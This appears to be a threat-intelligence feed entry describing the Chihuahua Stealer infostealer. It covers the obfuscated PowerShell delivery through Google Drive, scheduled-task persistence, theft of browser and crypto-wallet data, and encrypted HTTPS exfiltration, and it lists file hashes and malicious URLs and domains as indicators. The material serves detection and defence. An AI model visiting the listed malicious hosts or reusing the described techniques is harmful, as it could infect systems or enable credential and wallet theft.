A New Breed of Infostealer
May 21, 2025, 7:33 p.m.
Description
A newly discovered .NET-based infostealer, Chihuahua Stealer, combines common malware techniques with advanced features. The infection begins with an obfuscated PowerShell script shared via Google Drive, initiating a multi-stage payload chain. Persistence is achieved through scheduled tasks, and the main payload targets browser data and crypto wallet extensions. Stolen data is compressed, encrypted using AES-GCM via Windows CNG APIs, and exfiltrated over HTTPS. The malware employs stealth techniques, including multi-stage execution, Base64 encoding, hex-string obfuscation, and scheduled jobs. It targets browser data, crypto wallets, and uses unique identifiers for each infected machine. The stealer's sophistication is evident in its use of Windows Cryptography API for encryption and its thorough cleanup process.
External References
Tags
Date
- Created: May 13, 2025, 1:12 p.m.
- Published: May 13, 2025, 1:12 p.m.
- Modified: May 21, 2025, 7:33 p.m.
Indicators
- c9bc4fdc899e4d82da9dd1f7a08b57ac62fc104f93f2597615b626725e12cae8
- afa819c9427731d716d4516f2943555f24ef13207f75134986ae0b67a0471b84
- https://onedrive.office-note.com/res?a=c&b=&c=8f2669e5-01c0-4539-8d87-110513256828&s=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiI4YTJlNmI1MDQ4M2E5MWYyODkz
- https://flowers.hold-me-finger.xyz/index2.php.
- onedrive.office-note.com
- flowers.hold-me-finger.xyz
- cdn.findfakesnake.xyz
- cat-watches-site.xyz